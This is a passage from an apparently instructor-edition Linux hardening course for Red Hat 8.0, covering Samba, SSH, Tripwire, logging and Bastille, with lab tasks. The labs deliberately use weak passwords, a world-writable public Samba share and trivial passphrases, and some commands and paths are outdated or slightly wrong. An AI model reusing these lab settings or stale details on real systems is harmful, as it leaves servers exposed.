TASK 3D-3Configuring the Samba Server

Objective: For this task, we will create a simple public share that Win-dows clients will be able to access on our Linux server.

Setup: Students should work in pairs for this exercise. One studentwill use Windows 2000 Server and the other Red Hat Linux8.0. If time permits, the task should be done twice with theWindows and Linux roles reversed, so that both students canperform the Linux install and be the Windows client.

Note:Perform step 1 through step 22 only if you have been designated as theLinux user.

1. On the Linux machine, from the Red Hat Main Menu, choose SystemSettings→Users And Groups to prepare to create a user account for theWindows user who will be connecting to the share.

2. Click the Add User button.

3. Set the User Name to administrator_bob. Set the Password to administra-tor, and confirm the typing of the password.

4. Click OK to add the new user. Close User Manager.

5. Open the Nautilus File Manager to prepare to create the file that will beused for the public share.

6. Under Location, change /root to /, and press Enter.

7. In the open space displaying the directories under /, right-click and chooseNew Folder. Name the folder samba_share.

If NetBIOS has been disabledfor any reason in Windows,it should be re-enabled forthis task.

Lesson 3: Hardening Linux Computers 207

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 261: SCNP Hardening

8. Right-click the new folder and choose Properties.

9. On the Permissions tab, change the permissions so that owner, group,and others all have read, write, and execute permissions. Observe howthe text and numerical views change as you check or uncheck the boxes.This might help you better understand the relationship between the types ofpermissions displays. Click Close.

10. Navigate to and open the /etc/samba directory.

11. Right-click the smb.conf file and choose Copy File. Paste the copy intothe same folder by deselecting the file and right-clicking in the openspace of the folder and choosing Paste File.

12. Right-click the copy and choose Properties. Change the name of the fileto smb.conf.bak. Although it’s not quite necessary to do it in this case, it isusually a very good idea to make a backup of a working configuration filebefore you make any changes to it.

13. After your backup has been made, right-click the smb.conf file and open itin Emacs.

14. Take a quick look through the sample config to become familiar withsome of the things you can do with Samba, then select and delete all ofthe text in the file.

15. Enter the following lines:

# global settingsworkgroup = workgroupserver string = Samba Serverhosts allow = 172.16. 172.17. 172.18. 127.security = userlocal master = noname resolve order = host bcastencrypt passwords = yessmb passwd file = /etc/samba/smbpasswdsocket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192# share definition[public share]comment = public samba sharepath = /samba_sharebrowseable = yespublic = yeswritable = yes

If you like, you can use anyother text editor, such as

OpenOffice or jpico.

208 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 262: SCNP Hardening

16. Save your changes and close the file.

17. To test your configuration changes for syntax errors, open a Terminal Win-dow and enter testparm. Examine the results displayed, press Enter toview the service definitions, correct any errors (typos are usually toblame), and retest before you proceed.

18. In the Terminal Window, enter smbpasswd -a administrator_bob adminis-trator to add the user you created earlier to the list of users who can accessSamba shares with an encrypted password.

If you see an error message, re-enter the command.

19. In the Nautilus File Manager, find the /etc/services file, and verify that itcontains this line: swat 901/tcp to provide SWAT functionality. If neces-sary, add the line and save the file.

20. Find the /etc/xinetd.conf file, and edit it to add the following line: swatstream tcp nowait,400 root /usr/sbin/swat swat, then save and close thefile.

21. In the Terminal Window, enter /etc/rc.d/init.d/smb start to start yourSamba server. You should see two starting responses.

22. Give your machine a few minutes to update the local network, then askyour partner to complete the rest of the task.

Note: Perform the rest of this task only if you have been designated as theWindows user.

23. At the Windows 2000 Server machine, log on as administrator, and openMy Network Places.

24. Verify that you can see the Samba Server in the workgroup. This sharecan also be reached like any other normal share in a Windows network byusing normal UNCs (\\ServerName\public share). This would be even morevaluable information if the share were marked as not browsable.

If you are using OpenOffice,when you choose to save,you will see a pop-up askingif you want to save it in theOpenOffice.Org 1.0 textdocument format. Click No,then when you go to closeOpenOffice.Org, you will begiven another warning tellingyou that saving in externalformats may have causedinformation loss. When youare asked if you still want toclose, click Yes.

If swat is not installed in thedefault location of /usr/bin,alter the line to match thelocation of your swat file.

If your partner’s machine isunavailable, check thesmb.conf file to ensure thatthe hosts allow line isaccurate.

Lesson 3: Hardening Linux Computers 209

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 263: SCNP Hardening

25. Double-click the icon for the Linux machine, and log in using the cre-dentials your partner entered earlier in the task.

26. Reboot and log in to Linux as root.

Topic 3EFinal OS HardeningIn this topic, you will investigate several additional hardening methods, includingsecuring the system startup and shutdown processes, logging, Tripwire, andBastille.

System Startup/Shutdown SecurityUp to this point, all the security issues addressed were ones that required the sys-tem to be up and running, and interacting with clients and other computers. Thereare things you can do to affect the overall security of the machine, even beforethe system is fully loaded and operational.

The computer’s boot loader is the small file that allows the computer to load theoperating system, and often presents the computer user with a small menu of OSsto load. In Linux, the boot loader is usually LILO (which stands for LinuxLoader). LILO is configured at the end of the installation process, but it can bemodified later for added security. Figure 3-25 shows an example LILO file thathas not been altered since the install of the OS.

Figure 3-25: A Linux lilo.conf file.

Hardening Startup andShutdown Routines

210 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 264: SCNP Hardening

The primary item to add to the LILO file is the ability to add a password. Anexample syntax is simply password=L1L0_p@s5. The LILO file is notencrypted, and the password will be stored in cleartext in the file. This means thatyou will need to secure the file so that users, other than the root account, cannotread it. It is also suggested that you implement a password on the computer’sBIOS, and if the option exists, disable the use of the floppy disk drive.

The opposite end of the spectrum is the process of shutting down the system.Linux has a specific sequence of events that happens during the shutdownprocess. The general process of bringing down a Linux system by using the shut-down command is detailed in the following four steps:

1. Notifies other processes and user accounts that the shutdown is imminent.

2. Shuts down the other processes that are still running.

3. Notifies root of the services that are shut down.

4. Reboots the system (if specified).

The shutdown command can be run only by the root account. The file is locatedin /sbin/shutdown, and has two common switches. Using the -r option reboots thesystem, and using the -h option halts the system. (Halt means that the system willpower down.)

Shutting down the system properly—not just hitting the power switch—and let-ting the system complete the shutdown process is important. A system that is notshut down properly might not unmount partitions, leading to system corruption.

Consider changing the permissions on the shutdown command. If the majority ofthe users of the system were connecting remotely, you would likely want thatcommand to be available only to the root account. If they are local users, youmight decide to have the command available to everyone.

Removing ServicesOne of the fundamental steps in hardening any OS is to remove, or disable, ser-vices and unwanted aspects of the OS that are not going to be used, withoutaffecting the OS’s functionality. From the Terminal Window, you can kill the ser-vices one at a time, as you wish.

You can use the kill utility to end a service. When executed, the kill utility sendsa signal to the service, which is identified by the PID. If no signal is specified inthe syntax of the command, a TERM (terminate) signal is sent. The initial syntaxis simply kill <PID>. If you need to restart the service after it has been killed(if you have made changes to it, for example), just add the -HUP switch, for acommand syntax of kill -HUP <PID>.

Another great tool for disabling services is the Service Configuration tool. Thistool allows for the quick visual check of running services, and enables you to usecheck boxes to start and stop services, without having to resort to using the com-mand syntax. Figure 3-26 shows the Service Configuration tool.

Removing Services

Remember, to find ProcessIDs for running services, usethe ps command.

Lesson 3: Hardening Linux Computers 211

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 265: SCNP Hardening

Figure 3-26: The Service Configuration tool in Red Hat Linux.

A great feature of this tool, as you can see from the image, is that there is a shortdescription of each service. For example, the highlighted service could probablybe turned off on a desktop computer. This is helpful for the services you are notsure about. If you are still unsure, even after reading the short description, youmust do more research before changing your system. Turning off the wrong ser-vice can have drastic consequences, so you should attempt to do so only if youare certain of the results.

TASK 3E-1Stopping Unneeded Services

Setup: You are logged in to Linux as root.

1. In a Terminal Window, enter serviceconf to start the Service Configurationtool.

2. Scroll through the list, and examine the processes that you can stop,such as apmd.

3. Stop the apmd service, click Save, and quit the Service Configuration tool.

212 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 266: SCNP Hardening

Linux Run LevelsIn the Service Configuration tool, you might have noticed a Runlevel indicator.The run levels of Linux are the basic modes of operation. An analogy for Win-dows users is running in Safe Mode, because that is a different mode of operationfor the OS. Linux has six different run levels:

• 0: Halt the System

• 1: Single-user Mode

• 2: Multi-user Mode (without NFS)

• 3: Multi-user Mode

• 5: Multi-user Mode, with a Graphical Login

• 6: Reboot the System

For most systems, the default is to use a run level of 5. If you want to have thesystem load into a text-mode login, then use run level 3. Levels 1 and 2 arerarely used.

A program called init is responsible for the starting and stopping processesbased on run level. You can manually enter a runlevel command. For example, toshut down and halt the system you can use the telinit 0 command; to shutdown and reboot the system, you can use telinit 6.

SSHEven though you use telnet often in this class, and perhaps in the office, thebehavior of telnet is not secure enough for organizations that require high levelsof security. The reason that telnet is not considered to be secure enough is thatthe authentication of telnet is carried out in cleartext. Anyone sniffing the segmentcan learn the user name and password for telnet authentication.

The replacement for telnet is SSH, or Secure Shell. SSH creates a secure connec-tion between the client and the server, where the client initiates allcommunication. There are several benefits to the security of the network fromusing SSH, including:

1. Authentication is encrypted, so the user name and password are never trans-mitted in cleartext.

2. After a session is established, the client verifies that the server is still thesame host that the client started the session with.

3. Data transferred between client and server is encrypted using 128-bitencryption.

In Red Hat Linux 8.0, a version of SSH called OpenSSH is included. Thisincludes the OpenSSH Server (openssh-server) and the OpenSSH Client (openssh-client) packages. OpenSSH also requires the OpenSSL package for thecryptographic component, which is included. The OpenSSH daemon uses the con-figuration file /etc/ssh/sshd_config. To configure an OpenSSH Server, you canenable the OpenSSH service by using the /sbin/service sshd startcommand.

secure shell:A completely encrypted shellconnection between twomachines protected by asuper long pass-phrase.

Lesson 3: Hardening Linux Computers 213

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 267: SCNP Hardening

The server will generate RSA keys for use with SSH. The RSA keys are found inthe /etc/ssh directory. Keys in the file that end with a .pub extension are publickeys, and should be readable by everyone. Keys in the file that end with a _keyextension are private keys, and should only be readable by root. Once the com-mand finishes running, you are ready to accept clients using SSH.

TASK 3E-2Configuring an SSH Server

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. In the Terminal Window, enter /sbin/service sshd start to start the SSHServer.

2. If necessary, acknowledge that you want to generate key pairs. The keysmight have been generated during the install of the OS.

3. In the Terminal Window, navigate to /etc/ssh.

4. Check the permissions on the key files. Remember, you can use the ls -lcommand to do this.

5. Close all windows. The SSH server is now running

Configuring and Using the SSH ClientThe client side is straightforward as well. You must have openssh-clients andopenssh installed on the client side, in comparison to openssh-server and opensshon the server side. If the required packages are installed, you are ready to walkthrough the process of SSH on the client side.

1. Log in as your normal user account.

2. To generate the private and public key pair that you will use, use the/usr/bin/ssh-keygen command. The pair will be located in your/home/ssh directory.

3. Enter the command to access the remote SSH server. If the SSH server isSSH1.example.com, your command would be ssh SSH1.example.com.

4. If this is the first time you have connected to this machine, you will beprompted that the authenticity of the host can’t be established. Click Yes tocontinue. The prompt is due to your machine not having information on theremote SSH server.

5. When you answer Yes, an entry is made into the known_hosts file in your/home/ssh directory. You are then prompted for your user name andpassword.

6. Enter your credentials to complete the connection to the SSH server.

Every user on the systemwill have a unique key pair.

214 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 268: SCNP Hardening

TASK 3E-3Configuring an SSH Client

Setup: You are logged on to Red Hat 8 as root. Students should workin pairs for this exercise.

1. In a Terminal Window, enter /usr/bin/ssh-keygen -t rsa to generate a newkey pair.

2. Accept the default location for storing the key pair. The default will be inyour user account’s home directory.

3. When you are prompted for a passphrase, enter your first name. Thispassphrase must be at least five characters, so if you have a short first name,add some letters or numbers to it. Confirm the passphrase when you areprompted to do so.

4. In the Terminal Window, navigate to your /root/.ssh/ directory.

5. Verify the key pair and the permissions. Again, use the ls -l command todo this.

6. Enter ssh a.b.c.d, where a.b.c.d is your partner’s IP address, to connect toyour partner’s computer. Because it is your first connection to the remoteSSH server, you are prompted to continue the connection.

7. Answer Yes to continue the connection.

8. When prompted, enter your credentials, just as you would if you wereusing telnet.

9. Navigate as you would in a telnet session to verify connectivity, then closethe session by using the exit command.

10. If necessary, navigate to the known_hosts file in your /home/user.ssh/directory. Enter cat known_hosts to view the entry for your partner’scomputer.

11. Close all windows.

Use your Linux credentials,not the passphrase.

Lesson 3: Hardening Linux Computers 215

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 269: SCNP Hardening

TripwireTripwire is the most commonly used file-integrity checker for Linux. It is oftenused as part of a company’s intrusion detection system (IDS) because it can beused to maintain a snapshot taken of your system while in a known-good state;which it will compare against the running system at regular intervals to determineif any of the protected files have been altered or otherwise tampered with.

Tripwire does this by creating a one-way hash value for a directory or file. Thishash is stored, and when subsequent checks are made of that directory or file,Tripwire again hashes the object and compares the resulting hash against thestored value. If the hashes do not match up, a flag is raised, and various actionscan then be taken, depending on the configuration of the policy.

The Tripwire ModesTripwire has several modes that the user should be familiar with:

• The Database Initialization Mode is usually one of the first modes used. Itwill create the snapshot of your system that Tripwire will use for integritychecking.

• Integrity Checking Mode is usually run after the database has been created.This mode searches the system for differences when compared to thebaseline database. This mode will generate a detailed report of any violationsfound in accordance to the Tripwire policy.

• Database Update Mode is used to change your baseline database. Forinstance, if you monitor your /etc/shadow file and you have created accountsfor two new employees, your integrity check will always report the viola-tion, even though you needed those two changes. You could run in DatabaseUpdate Mode to alter your database to include the two new changes.

• Policy Update Mode is used to update changes to Tripwire’s policy file.

• Test Mode is used to test the ability of Tripwire’s email notification system.When used, this will send a test message to the account specified.

The Tripwire PolicyThe Tripwire Policy file, twpol.txt, is normally found in the /etc/tripwire directoryand is a plaintext document that is configured by default to check most of thefiles in the Red Hat install.

Tripwire

tripwire:A software tool for security.

Basically, it works with adatabase that maintains

information about the bytecount of files. If the byte

count has changed, it willidentify it to the system

security manager.

intrusion:Any set of actions that

attempts to compromise theintegrity, confidentiality, or

availability of a resource.

It should be noted thoughthat Tripwire is not a true

integrity checker in thepurest sense of the word,

because Tripwire does notcheck some properties such

as the inode information.

216 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 270: SCNP Hardening

Figure 3-27: The editable twpol.txt file.

This file can be altered like any text document to configure the policy so thatonly the files you specify will be checked. In addition to defining what filesshould be checked, there are several options that will determine how Tripwirewill react while checking those files. This is a small list of some of the moreimportant options that can be used:

• /etc/shadow -> $(IgnoreNone) tells Tripwire that it should reportany and all changes made to the shadow file.

• !/proc tells Tripwire to ignore the entire /proc directory.

• /var/log/maillog -> $(Growing) tells Tripwire that the file isexpected to get larger (as most logs do), but still alert if the file gets smaller.

• /etc/shadow -> +ug (emailto=admin@some_company.net)tells Tripwire to email an alert if there is a change noticed in the shadowfile.

After the policy file has been configured, it is time to start things rolling. Fromthe /etc/tripwire directory, run the command ./twinstall.sh to start the pro-cess of creating key pairs for securing files, creating the twpol file, and creatingthe backup of the twpol file.

alert:A formatted messagedescribing a circumstancerelevant to network security.Alerts are often derived fromcritical audit events.

Lesson 3: Hardening Linux Computers 217

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 271: SCNP Hardening

Figure 3-28: Tripwire setup and passphrase request.

The Tripwire DatabaseThe Tripwire database will be generated using the configuration parameters thatwere defined earlier. To start the database-creation process, run the tripwire--init command. Depending on the number and size of the files that are beingchecked, the database generation can take a significant amount of time. It is forthis reason that when we change the policy that we will be checking only a singlefile! To view the specifics of the database, run the twprint--print-dbfile command.

The Tripwire Integrity CheckOnce the database has been created, it’s generally a good idea to make sure thatthe notification system is operating properly by using the test parameter. To dothis, enter the tripwire --test --email root@localhost commandinto a Terminal Window.

218 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 272: SCNP Hardening

Figure 3-29: The Tripwire mail test.

To actually run an integrity check, use the tripwire --check command.

There are a few switches that you might want to use if you are automating thiswith a script. The -s switch will not display the report to standard output, usuallybecause you will not be logged in when the script will be set to run. The -Mswitch will tell it to email the report if you have placed an emailto= line in yourpolicy.

To read the results of a report, use the twprint --print-report -r/var/lib/tripwire/report/XXXXX.twr command, where XXXXX.twris the name of one of the report files located in the /var/lib/tripwire/report/directory.

Best PracticesIt is generally a good idea not to keep the database in its default location (/var/lib/tripwire/hostname.twd), because anyone who gains unauthorized access to thesystem might be able to update the database so that it will not report any of thefiles that were altered. Often, the database is placed onto read-only media, suchas a CD-ROM. In such a case, the integrity check command would have toinclude the -d option to tell Tripwire where the database is located; for example:tripwire -check -d /mnt/cdrom/dbfile.twd

To change your database, update the policy file (twpol.txt) as needed, and thenrun the tripwire -m p /etc/tripwire/twpol.txt command.

To automate the running of Tripwire, you can run it as a cron job. By default,Red Hat has an entry in the /etc/cron.daily/ directory to have Tripwire run daily.If it is not there, you can create a simple job to run, similar to the following:

1. Create a new text file named tripwire, and enter the following lines.

#!/bin/bash# Daily Tripwire Check/usr/sbin/tripwire --check -M

2. Place the new file in the /etc/cron.daily/ directory.

3. Make the file executable by running the chmod -v u+x tripwirecommand.

Lesson 3: Hardening Linux Computers 219

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 273: SCNP Hardening

TASK 3E-4Starting Tripwire

Setup: You are logged on to Red Hat 8 as root.

1. Start Nautilus File Manager, and navigate to /etc/tripwire.

2. Make a backup copy of the twpol.txt file.

3. Open the twpol.txt file in a text editor such as Emacs.

4. Edit the twpol.txt file to read as follows:

#@@section FSSIG_HI =100;

(rulename = "Passwd Check",severity = $(SIG_HI),emailto = root@localhost

){/etc/shadow -> $(IgnoreNone);}

In the interest of time, you will be checking and tracking only the shadowpassword file for changes. In a production install, you would obviously betracking changes far more thoroughly.

Save and close the file.

5. In a Terminal Window, navigate to the /etc/tripwire directory, and enter./twinstall.sh to run the Tripwire install.

6. When you are asked for a site keyfile passphrase, enter and confirm twpassas the site passphrase.

7. When you are prompted to provide a local keyfile passphrase, enter andconfirm localpass as the local passphrase.

8. When you are prompted for the site passphrase, enter twpass to continuewith the install.

You will be notified that the configuration file was written to the /etc/tripwiredirectory as tw.cfg, and that a cleartext version, called twcfg.txt, was writtenfor your inspection. After inspecting twcfg.txt, you should delete it for secu-rity purposes.

Like with the smb.conf file,you can delete all of the

existing text because youhave a backup of the original

configuration file.

220 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 274: SCNP Hardening

9. When you are prompted for your site passphrase so that the new policy canbe signed, enter twpass to complete the setup routine.

10. In the Terminal Window, enter tripwire --init to start Tripwire.

11. When you are prompted for the local keyfile passphrase, enter localpass toprovide the local passphrase.

12. Observe the message that states the database was successfully generated.

13. In the Terminal Window, enter tripwire --test --email root@localhost to testthe email capabilities of Tripwire. You will see a message telling you that anemail is being sent.

14. To see if the email was delivered correctly, switch to Nautilus File Man-ager, and navigate to the /var/spool/mail/ directory.

Lesson 3: Hardening Linux Computers 221

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 275: SCNP Hardening

15. Right-click the root file, and choose Open In New Window to open theTripwire email. If you have not deleted this file recently, you may have sev-eral messages from the system already—scroll down to the bottom, and thetest email from Tripwire should be there.

16. Navigate to the email folder (/var/spool/mail/), and delete the root file.This will make it easier for you to find future email messages.

17. Switch back to the Terminal Window, and enter tripwire --check -M toperform an integrity check and have Tripwire email you the report.

222 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 276: SCNP Hardening

18. Return to the /var/spool/mail/ directory, and verify that you have a newroot file.

19. Rename the root file to rootfirst to rename the Tripwire email report.

20. Open the rootfirst file by right-clicking it and choosing Open In NewWindow. This is the report you just generated, which is also visible in theTerminal Window if you scroll up a little. Keep the window open—we willcompare this report to the next report we generate.

21. From the Red Hat Main Menu, choose System Settings→Users AndGroups to open the Users And Groups tool.

22. Select any user that you created during an earlier exercise, change theuser’s password, and exit the tool.

23. Switch to the Terminal Window, and run the tripwire --check -M com-mand again.

24. Return to the /var/spool/mail/ directory, and open the new root file.Compare it to the rootfirst file, looking for differences. Pay particularattention to the Object Detail sections to view the differences. In theTripwire reports, Access Time will always show up, but the Modify andChange times should not differ unless there has been a change to the file (aswould be the case if someone created a new account or modified apassword).

25. Close all windows.

If, for some reason, you haveremoved all accounts exceptthe root account, you canalso add a new user accountto accomplish the same goal.

Lesson 3: Hardening Linux Computers 223

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 277: SCNP Hardening

LoggingLogging is a necessary evil in all operating systems. In Linux, you are presentedwith the ability to log enormous amounts of data. You can log the system, appli-cations, and protocols. The output of most of the logs are text files in the /var/logdirectory. Figure 3-30 shows a partial listing of the /var/log directory on Red HatLinux 8.0.

Figure 3-30: The /var/log file.

There are far too many log files to cover in this lesson, so you will examine sev-eral of the critical log files as they relate to security. The first two logs are calledlastlog and last.

The lastlog Log FileThe /var/log/lastlog file tracks the last login of user accounts into the system. Thefull log will provide extensive information, so if you are just curious about asingle user account, use the command syntax: lastlog --u <username>.This is a temporary log—one that you should back up daily if you want to usethis data over time.

Logging

224 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 278: SCNP Hardening

Figure 3-31: The /var/log/lastlog file.

The last Log FileThe last file tracks the last login data, similar to the previous example, but addsanother level of information. This file can report on the users, their IP addresses(or hostnames), the date and time of the last connection, and the duration of thelast session. Stored in /var/log/wtmp, this log can be viewed by using the lastcommand in the Terminal Window. If you are looking for information on a spe-cific user account, use the syntax: last <username>. Using the -a option willdisplay hostname information, and the -d option will display hostname and IPaddress information.

Lesson 3: Hardening Linux Computers 225

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 279: SCNP Hardening

Figure 3-32: The last log output with the -a and the -d options.

TASK 3E-5Logging Recent Login Activity

Setup: You are logged on to Red Hat 8 as root.

1. In Nautilus File Manager, navigate to the /var/log directory.

2. Observe the logs that are stored in this directory.

3. In a Terminal Window, navigate to the /var/log directory.

4. Enter lastlog to view the lastlog file.

5. In another Terminal Window, enter last -a -d root to check the last log forroot.

6. Close all windows.

226 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 280: SCNP Hardening

The xferlog Log FileIf your system is running FTP, you will most likely want to track the file trans-fers taking place. The xfer log is the one you will investigate for these details.Usually found in the /usr/adm directory, the log contains server entries, each com-posed of a single line. You can read this output in the Terminal Window bysimply viewing /var/log/xferlog (you may end up using the more option). Thefields that this log can track are extensive, and include:

• The date of the transfer.

• The time of the transfer.

• The duration of the transfer.

• The client hostname and IP address.

• The size of the file transferred.

• The file name of the file transferred.

• The transfer type (ASCII or binary).

• The direction of the transfer (incoming or outgoing).

• The access method (anonymous, guest, or user account).

• The authentication method.

Web Server Log FilesJust as you will want to track your logs for an FTP server, if you are running aWeb server, such as Apache, you will want to have solid logging of the Webconnections. The Apache server process generally has two logs, found in /var/log/httpd. The two logs are:

• access_log—Logging clients who contacted the Web server, when, how, andwhat did the client do while connected.

• error_log—Logging access attempts, both successes and failures.

The access_log will track the client’s IP address, the time and date of access, thecommand or request the client made, and the status code. The status codes arelistings such as:

• 200—Transfer completed without error.

• 201—A successful POST command has completed.

• 300—Client requested data that has moved.

• 404—The requested document was not found.

The error_log will track data such as the date and time of the connection, thetype of error report, the reason for the error, the service, and the action taken (ifany).

The secure Log FileWhen you were configuring services for xinetd and for TCP wrappers, there wasan option in the configuration file of the service for log_on_failure and log_on_success. You can view entries from these options, as well as SSH connectionstatus in the /var/log/secure file.

More information might belogged depending on howhttpd.conf is configured onthe Apache server.

Lesson 3: Hardening Linux Computers 227

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 281: SCNP Hardening

Using the Log ViewerYou might become comfortable reading the logs directly from their sources. How-ever, in Red Hat, there is a utility that is designed to help with reading andmanaging the log files. This utility, called the Log Viewer, can be found under theRed Hat Main Menu by choosing System Tools→System Logs, or in a TerminalWindow by using the redhat --logviewer command. The logviewer pro-gram is able to display only those log files that it knows exist. The configurationfile that stores the available logs is found at /etc/sysconfig/redhat–logviewer. TheLog Viewer is shown in Figure 3-33.

Figure 3-33: The logs presented in the Red Hat Log Viewer.

The Red Hat Log Viewer is a dynamic program, meaning that it keeps updatingthe information seen on-screen to remain current. The default refresh rate is 30seconds. The default can be changed in the viewer (by altering the Preferences)or directly in the sysconfig file, where the available logs are stored. You can alsoforce an immediate refresh by using the File→Refresh Now command, or bypressing Ctrl+R.

TASK 3E-6Using the Log Viewer

Setup: You are logged on to Red Hat 8 as root.

1. From the Red Hat Main Menu, choose System Tools→System Logs to openthe Log Viewer.

2. View the Security Log, noting the records of access.

3. View the System Log, noting the records of access.

228 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 282: SCNP Hardening

4. Another handy log to view is the one that defines the RPM packagesinstalled. Check the RPM Packages list to see the Open SSH componentsthat are installed.

5. Once you have viewed all the information you want, close the window.

Securing Log FilesAlthough reading the log files directly can provide you the information you areseeking, there is a risk of leaving the files on the computer itself. If an attackerdoes compromise the server, an initial target will be to wipe out any log files thatcan trace the attacker’s activities.

One option to combat this is to use syslog. Syslog is the logging subsystem inLinux (and UNIX) that controls the logging function. A benefit of syslog is that itis possible to have logs forwarded to another system in the network. The primaryconfiguration file for syslog is /etc/syslog.conf.

BastilleBastille is an Open Source program that can help you automate many of the pro-cesses for hardening a Linux machine. It can help ease an administrator’s job bymaking several tasks—like implementing IPChains, enabling or disabling ser-vices, and closing unused ports—quick and simple by asking the user a longseries of mostly yes or no type questions.

Bastille’s AbilitiesBastille has the ability to help automate many security-minded functions on asystem, including:

• Disabling the compiler.

• Creating login banners.

• Restricting resource usage.

• Disabling IP-based authentication protocols for anti-spoofing protection.

• Finding and updating RPMs by using the RedHat errata Web site(www.redhat.com/support/errata).

• Disabling system shutdown via the Ctr+Alt+Delete key combination.

• Restricting access to many common administration utilities.

• Protecting the LILO with a password.

• Running an IPChains script to automate much of the configuration to makethe machine a firewall.

• Configuring NAT settings (as part of IPChains).

• Limiting console login rights.

• Setting password aging parameters.

• Configuring remote logging.

• Removing unneeded daemons.

• Hardening Apache (not always as predictable as you might expect).

compromise:An intrusion into a computersystem where unauthorizeddisclosure, modification, ordestruction of sensitiveinformation may haveoccurred.

Bastille

spoofing:Pretending to be someoneelse. The deliberateinducement of a user or aresource to take an incorrectaction. Attempt to gainaccess to an AIS bypretending to be anauthorized user.Impersonating,masquerading, andmimicking are forms ofspoofing.

Lesson 3: Hardening Linux Computers 229

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 283: SCNP Hardening

Installing and Using BastilleTo install Bastille, you will need the RPM for Bastille, as well as the pwlib andperl-TK RPMs. The RPMs should be installed in that same order, then—from aTerminal Window, issue the command bastille to start the Bastille configura-tion routine. From there, follow the prompts and answer all the questions beforecontinuing on to the next section.

The left side of the screen lists the section of the config you are dealing with (theModule). The top right lists the question you are presently dealing with. The cen-ter right has a brief description of, or the purpose of, the current module. Thebottom right is where you answer the yes or no question.

Figure 3-34: Bastille Q&A.

For some of the questions, you can opt to enter things like warning banners.When it is time to enter the text for your message or to enter a password (for anyquestion that can’t be answered yes or no), just type the text into the bottom-rightwindow labeled Answer.

230 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 284: SCNP Hardening

Undoing Configuration ChangesThe best way to make sure that you do not need to undo any changes is to—likethe old carpenter’s adage—measure twice, cut once. By this, we mean that youshould make a change only if you understand the repercussions of the choicesyou are making. However, this isn’t a perfect world, and sometimes, changesneed to be made. For this reason, there are a few possible ways to undo thechanges made to a system. Of course, they aren’t 100 percent, so always try tomeasure twice before cutting! To undo configuration changes, you can try thefollowing:

• Rerun Bastille, and make different choices to reverse the previous answers.To do this, navigate to the Bastille directory and use the./InteractiveBastille.pl command.

• There is also a perl script that was made to try to undo changes; accuratelyenough, it is named undo.pl, and is located in the Bastille directory.

• The last way to attempt a reversal of Bastille changes is to go to the backupdirectory (/root/Bastille/undo/backup); this directory contains copies of thesystem files that Bastille has altered. You should, with relative ease, be ableto replace most of these files, even if it will not be a fast or automatedsolution.

It should be obvious that with all that Bastille can control that you should becareful with your configuration choices. Selecting options that you don’t fullyunderstand can cause problems with running programs and accessing the machinefor legitimate uses. It is for this reason that the Bastille routine should be run—but not implemented—on your machine in class. Feel free to explore all theoptions, but do not apply the configuration changes!

TASK 3E-7Installing and Exploring Bastille

Setup: You are logged on to Red Hat 8 as root.

1. Create the directory /bastille where you will store the Bastille files.

2. Copy the three required files to the /bastille directory. The files are:

Bastille-2.0.4-1.0.i386.rpm

pwlib-1.3.3-5.i386.rpm

perl-Tk-800.023-9mdk.i586.rpm

Version numbers used in class may differ from these examples. If that is thecase, alter your commands to reflect the different version numbers.

3. In a Terminal Window, navigate to the /bastille directory, and enter thefollowing commands, in sequence:

rpm -ivh Bastille-2.0.4-1.0.i386.rpmrpm --nodeps -ivh pwlib-1.3.3-5.i386.rpmrpm --nodeps -ivh perl-Tk-800.023-9mdk.i586.rpm

Again, modify these lines to refer to the correct version numbers if you areusing different releases of these RPMs.

The method by which youwill be given these files willbe explained by yourinstructor. In most cases,you will be provided with aCD-ROM or a network-shareURL, or the files will alreadybe on your hard drive.

You might get a messagesaying that pwlib is alreadyinstalled. If so, continue withthe activity.

Lesson 3: Hardening Linux Computers 231

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 285: SCNP Hardening

4. After the RPMs are finished with their routines, enter bastille into the Ter-minal Window to start the Bastille program. A disclaimer is displayed.

5. Read the disclaimer, and enter accept to continue with the install. A GUIinterface is displayed, where you will answer a series of questions to alterthe configuration of your machine.

6. For each question, read the explanation, select the answer that best fitsyour requirements, and click OK to move to the next question. Don’t beconcerned if this step takes a little while—there are a lot of questions anddescriptions to read and answer.

7. When you are done with all of the modules, click OK to continue.

8. When you are prompted, save the configuration. When the Finishing Upwindow is displayed, click the Exit Without Changing System button.

